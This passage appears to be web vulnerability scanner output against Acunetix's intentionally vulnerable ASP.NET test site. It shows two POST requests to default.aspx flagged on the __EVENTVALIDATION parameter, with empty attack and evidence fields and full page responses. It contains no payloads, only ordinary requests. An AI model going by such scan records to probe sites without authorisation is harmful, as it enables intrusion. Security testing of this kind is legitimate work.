style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1157 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,157 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8264&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBAom3jf9oIZGRkDZEwtN4jTSd2aHrjTjWDjE17N3c%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKBwtXjAQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DUmI6Yo0MKViZ1hfUwnCBrvQTAnI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:26:36 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgBAom3jf9oIZGRkDZEwtN4jTSd2aHrjTjWDjE17N3c=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKBwtXjAQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DUmI6Yo0MKViZ1hfUwnCBrvQTAnI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:White" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1105 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,105 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8250&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDA2RvjdNoIZGRksYBT9bLdBu03VDkIq1sy1ChoZac%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKbzft%2FApyKwu8BAuKJ2soFAvuknccMAvuknccMAvuk8awJAvuk8awJAvuk5cMCAvuk5cMCAtzL9%2BgFAtzL9%2BgFAtzL648NAtzL648NAtzLn6IGAtzLn6IGAtzLs%2FkPAtzLs%2FkPAtzLp5wHAtzLp5wHAtzL2zAC3MvbMALcy8%2FXCQLcy8%2FXCQLcy%2BPqAgLcy%2BPqAgLcy9fTDwLcy9fTDwLcy8v2CALcy8v2CAKx0tWfCgKx0tWfCgKx0smyAwKx0smyAwKx0v3JDAKx0v3JDAKx0pHsBQKx0pHsBQKx0oWDDQKx0oWDDQKx0rmmBgKx0rmmBgKx0q39DwKx0q39DwKx0sGRBwKx0sGRBwKx0rX5BQKx0rX5BQKx0qmcDQKx0qmcDQKK%2BbsFAor5uwUCivmv2AkCivmv2AkCivnD%2FAICivnD%2FAICivn3kwoCivn3kwoCivnrtgMCivnrtgMCivmfzQwCivmfzQwCivmz4AUCivmz4AUCivmnhw0Civmnhw0Civmb7AsCivmb7AsCivmPgwMCivmPgwMCv5P7xAkCv5P7xAkCv5PvmwECv5PvmwECv5ODvgoCv5ODvgoCv5O31QMCv5O31QMCv5Or6AwCv5Or6AwCv5PfjAQCv5PfjAQCv5Pzow0Cv5Pzow0Cv5PnxgYCv5PnxgYCv5PbrwMCv5PbrwN97LHzRUTNTxQYHiaSCwVzTX3KcA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:50 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDA2RvjdNoIZGRksYBT9bLdBu03VDkIq1sy1ChoZac=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKbzft/ApyKwu8BAuKJ2soFAvuknccMAvuknccMAvuk8awJAvuk8awJAvuk5cMCAvuk5cMCAtzL9+gFAtzL9+gFAtzL648NAtzL648NAtzLn6IGAtzLn6IGAtzLs/kPAtzLs/kPAtzLp5wHAtzLp5wHAtzL2zAC3MvbMALcy8/XCQLcy8/XCQLcy+PqAgLcy+PqAgLcy9fTDwLcy9fTDwLcy8v2CALcy8v2CAKx0tWfCgKx0tWfCgKx0smyAwKx0smyAwKx0v3JDAKx0v3JDAKx0pHsBQKx0pHsBQKx0oWDDQKx0oWDDQKx0rmmBgKx0rmmBgKx0q39DwKx0q39DwKx0sGRBwKx0sGRBwKx0rX5BQKx0rX5BQKx0qmcDQKx0qmcDQKK+bsFAor5uwUCivmv2AkCivmv2AkCivnD/AICivnD/AICivn3kwoCivn3kwoCivnrtgMCivnrtgMCivmfzQwCivmfzQwCivmz4AUCivmz4AUCivmnhw0Civmnhw0Civmb7AsCivmb7AsCivmPgwMCivmPgwMCv5P7xAkCv5P7xAkCv5PvmwECv5PvmwECv5ODvgoCv5ODvgoCv5O31QMCv5O31QMCv5Or6AwCv5Or6AwCv5PfjAQCv5PfjAQCv5Pzow0Cv5Pzow0Cv5PnxgYCv5PnxgYCv5PbrwMCv5PbrwN97LHzRUTNTxQYHiaSCwVzTX3KcA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:White" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 